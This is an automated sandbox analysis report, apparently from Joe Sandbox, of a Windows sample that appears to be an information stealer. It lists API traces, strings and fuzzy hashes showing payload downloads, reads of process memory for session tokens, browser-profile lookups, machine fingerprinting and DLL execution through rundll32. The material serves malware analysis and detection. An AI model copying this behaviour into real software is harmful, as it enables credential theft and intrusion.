API ID: lstrcat$InternetOpenlstrcpy$lstrlen$CreateDirectoryHeapProcessProcess32$AllocChangeCloseExitFindFirstInformationNextNotificationSleepSnapshotToolhelp32VolumeWindowsstrtok_s
String ID: .exe$_DEBUG.zip$arp$dabl$http://$org$zapto
API String ID: 1055840830-1018522893
Opcode ID: b12ac8becdd7e5c5c0bdd63096e5a6c5264f4f9bac482ce768e84e4cfba400bb
Instruction ID: f22d2bd86038d1de50829419776aae838be0a57aa5f174395c24aa0c803a3848
Opcode Fuzzy Hash: b12ac8becdd7e5c5c0bdd63096e5a6c5264f4f9bac482ce768e84e4cfba400bb
Instruction Fuzzy Hash: 8AA24472D10114AACB24FB61DC52EEEB778AF54304F50817EE506725D2EF382B4DCAA9

Function 00404E90 Relevance: 15.1, APIs: 10, Instructions: 125networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404ED3
StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,00000000), ref: 00404EEE
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00404F13
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000), ref: 00404F36
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404F4F
WriteFile.KERNEL32(00000000,?,?,0041361C,00000000,?,?,?,?,?,?,00000000), ref: 00404F76
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404FA0
CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,00000000), ref: 00404FBC
InternetCloseHandle.WININET(00000000), ref: 00404FC3
InternetCloseHandle.WININET(00000000), ref: 00404FCA

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
String ID:
API String ID: 105467990-0
Opcode ID: 92c83e63622b23f5574742fac599d0d51e4c2cc34ec0516ba1567059f5ac1f8c
Instruction ID: 49284951317d46ce046ac4b453f539dd1d19b3831e62d401432a72fc81568d3a
Opcode Fuzzy Hash: 92c83e63622b23f5574742fac599d0d51e4c2cc34ec0516ba1567059f5ac1f8c
Instruction Fuzzy Hash: F3414FB2610205ABDB20EB71DC46FEE336CEB44704F505139F701B61D1DB78AA09CBA8

Function 0040E870 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 375COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00E59E38), ref: 0040E8C0
StrCmpCA.SHLWAPI(00000000,00E59D28), ref: 0040E947
StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040ECBD
StrCmpCA.SHLWAPI(00000000,00E59E68), ref: 0040EA4C

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

StrCmpCA.SHLWAPI(00000000,00E59E38), ref: 0040EB30
StrCmpCA.SHLWAPI(00000000,00E59D28), ref: 0040EBB9

Strings

firefox, xrefs: 0040ECAF
Stable\, xrefs: 0040E962, 0040EBD4

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$firefox
API String ID: 3722407311-3160656979
Opcode ID: 701918741428e08192ed56033c5b19e1c3f78348f1f85b6fba9e072669bb6fa4
Instruction ID: dc9232c6f18d92b7668f1a551db38a5b0db8dd03ba54f88d7fb460d1fcb80d8e
Opcode Fuzzy Hash: 701918741428e08192ed56033c5b19e1c3f78348f1f85b6fba9e072669bb6fa4
Instruction Fuzzy Hash: 97E12371A002049BCB24FF65D956EDE77B9BF44304F40C53EEC49AB691DB38AA08CB95

Function 0040F550 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 192COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040F561
OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000030), ref: 0040F588
memset.MSVCRT ref: 0040F5E4
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040F63C
memset.MSVCRT ref: 0040F6CF

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F5FA, 0040F6E8
N0ZWFt, xrefs: 0040F692

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Processmemset$MemoryOpenRead
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 2048220554-1622206642
Opcode ID: 94c5682253a37105a697971657c54386bbc5455e7de511139793b2f33be81175
Instruction ID: a21cb42e5d324bd6ca82509aa78599428660c3814b2df02d38e35266ba1ec8a6
Opcode Fuzzy Hash: 94c5682253a37105a697971657c54386bbc5455e7de511139793b2f33be81175
Instruction Fuzzy Hash: 93613471E00215AAEB309BA5DC45BAFB7B4AF84314F14453AE408B72C1E77C9948CBA9

Function 00413420 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,00E50050,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

ShellExecuteEx.SHELL32(0000003C), ref: 00413667

Strings

C:\ProgramData\, xrefs: 0041344F
.dll, xrefs: 004134B0
<, xrefs: 0041363A
C:\Windows\system32\rundll32.exe, xrefs: 00413595
O7A, xrefs: 0041360C, 004136C3, 00413611
"" , xrefs: 004134D2

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe$O7A
API String ID: 2215929589-785807056
Opcode ID: fe1bc0cba0ccf3508dba7fba7fcbe1393c38d9b202708c6fc16d59be1bae882b
Instruction ID: af7763d1ac9f1e24f06ba5b7101d0506636d2fa2f8484cc67acb28b390f71f36
Opcode Fuzzy Hash: fe1bc0cba0ccf3508dba7fba7fcbe1393c38d9b202708c6fc16d59be1bae882b
Instruction Fuzzy Hash: 6181C272D10108AADB28FBA1D852DED7778AF54704F50813FB512728E2EF78664DCA98

Function 00403D70 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Strings

5P@, xrefs: 00403DCD, 00403DDD, 00403DFB
<, xrefs: 00403D92

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: 5P@$<
API String ID: 1274457161-3404980136
Opcode ID: 60ed9ea01e3d07019788118dcee7b697ceaf86ecb3c6f670c601f99280d696c0
Instruction ID: ffcd9b35b4bfddae0e9debaaaaff4d4a67ad705ebd42d737fa1e7e78837649a8
Opcode Fuzzy Hash: 60ed9ea01e3d07019788118dcee7b697ceaf86ecb3c6f670c601f99280d696c0
Instruction Fuzzy Hash: 23113071D00208ABDB04EFA5DC85BDDB7B8EB44314F10513AFA15B7291EF745505CB98

Function 00410340 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410365
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004201E9), ref: 00410382
RegQueryValueExA.KERNEL32(004201E9,MachineGuid,00000000,00000000,00000000,000000FF), ref: 004103A4
RegCloseKey.ADVAPI32(004201E9), ref: 004103AE
CharToOemA.USER32(00000000,?), ref: 004103C2

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00410378
MachineGuid, xrefs: 0041039E

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValuememset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2391366103-1211650757
Opcode ID: e700b7023bf9e8dbd497fbb4e43d42ebc614438fbdd82c04f2954e56f97c9238
Instruction ID: 782b84d42d0d06b912d34d3dac9a589f721f2d7cdf24700b86374e4a20e7c3f4
Opcode Fuzzy Hash: e700b7023bf9e8dbd497fbb4e43d42ebc614438fbdd82c04f2954e56f97c9238
Instruction Fuzzy Hash: E001D475A4030CBBDB60DB90DC4AFEEB778EB04700F100199F648A6081DBB46BC48B94

Function 00415D00 Relevance: 10.6, APIs: 7, Instructions: 107stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,00E5A140,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415D5B

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

lstrcatA.KERNEL32(?,00000000), ref: 00415D7E
lstrcatA.KERNEL32(?,?), ref: 00415D9A
lstrcatA.KERNEL32(?,?), ref: 00415DAE
lstrcatA.KERNEL32(?,00E5AA78), ref: 00415DC1
lstrcatA.KERNEL32(?,?), ref: 00415DD5
lstrcatA.KERNEL32(?,00E59470), ref: 00415DE9

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D

Part of subcall function 00415A70: GetProcessHeap.KERNEL32(00000000,0098967F,00000000), ref: 00415A82
Part of subcall function 00415A70: HeapAlloc.KERNEL32(00000000), ref: 00415A89
Part of subcall function 00415A70: wsprintfA.USER32 ref: 00415AA2
Part of subcall function 00415A70: FindFirstFileA.KERNEL32(?,?), ref: 00415AB9
Part of subcall function 00415A70: StrCmpCA.SHLWAPI(?,004201DC), ref: 00415ADC
Part of subcall function 00415A70: StrCmpCA.SHLWAPI(?,004201D8), ref: 00415AF6
Part of subcall function 00415A70: wsprintfA.USER32 ref: 00415B18
Part of subcall function 00415A70: CopyFileA.KERNEL32(?,00000000,00000001), ref: 00415BBC

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 3853466361-0
Opcode ID: 9e6a0850db17328425639306e18ad6483d4aad9cb3e0c8312e2407d748278a90
Instruction ID: ff7054f365ac9ad5022fbea26b0be034ad24d24757db89e595a5bf3da34d5177
Opcode Fuzzy Hash: 9e6a0850db17328425639306e18ad6483d4aad9cb3e0c8312e2407d748278a90
Instruction Fuzzy Hash: 784154B294030C67CB14FBB0DC86ED9737C6F54704F0485AAB61562091EBB896C8CFA9

Function 00412FA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00405010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
Part of subcall function 00405010: StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,?), ref: 0040507A
Part of subcall function 00405010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
Part of subcall function 00405010: HttpOpenRequestA.WININET(00000000,GET,?,00E5ADC8,00000000,00000000,-00400100,00000000), ref: 004050DC
Part of subcall function 00405010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
Part of subcall function 00405010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FFA
lstrlenA.KERNEL32(00000000), ref: 00413011

Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

StrStrA.SHLWAPI(00000000,00000000), ref: 00413039
lstrlenA.KERNEL32(00000000), ref: 0041304E
lstrlenA.KERNEL32(00000000), ref: 0041306B

Strings

ERROR, xrefs: 00412FEC, 00413076, 0041309D

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR
API String ID: 3240024479-2861137601
Opcode ID: 3f1b5f13e281d68f892377b1d71d5188320e7d2f4ad61be59110ed56138bac52
Instruction ID: bd4d237804207bf9bc1d7224717f3b297064a78b5ccb05320e04b95c877dc140
Opcode Fuzzy Hash: 3f1b5f13e281d68f892377b1d71d5188320e7d2f4ad61be59110ed56138bac52
Instruction Fuzzy Hash: E43180329001046BCB24FF71DC569EE37A8AE54704F40813AFD0672592EF386B488BA8

Function 004105A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004105B5
HeapAlloc.KERNEL32(00000000), ref: 004105BC

Part of subcall function 0040FA60: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0040FA75
Part of subcall function 0040FA60: HeapAlloc.KERNEL32(00000000), ref: 0040FA7C
Part of subcall function 0040FA60: RegOpenKeyExA.KERNEL32(80000002,00E505D0,00000000,00020119,?), ref: 0040FA9B
Part of subcall function 0040FA60: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 0040FAB5
Part of subcall function 0040FA60: RegCloseKey.ADVAPI32(?), ref: 0040FABF

RegOpenKeyExA.KERNEL32(80000002,00E505D0,00000000,00020119,00000000), ref: 004105F1
RegQueryValueExA.KERNEL32(00000000,00E5A290,00000000,00000000,00000000,000000FF), ref: 0041060C
RegCloseKey.ADVAPI32(00000000), ref: 00410616

Strings

Windows 11, xrefs: 004105D0

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: a47b1fee11c922904502344837a3ea91d47d8b4281bde6fd73d92917b4b8e5ca
Instruction ID: 6a00dca0351ba1f1b5825a2528416373370fab3b8fd5f0a2b799655d5a0aabf6
Opcode Fuzzy Hash: a47b1fee11c922904502344837a3ea91d47d8b4281bde6fd73d92917b4b8e5ca
Instruction Fuzzy Hash: 1201D67160020CBBD710EBA4EC49EBB777EEB44305F00516AFA09D7250D7B499808BE0

Function 0040FA60 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0040FA75
HeapAlloc.KERNEL32(00000000), ref: 0040FA7C
RegOpenKeyExA.KERNEL32(80000002,00E505D0,00000000,00020119,?), ref: 0040FA9B
RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 0040FAB5
RegCloseKey.ADVAPI32(?), ref: 0040FABF

Strings

CurrentBuildNumber, xrefs: 0040FAAF

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
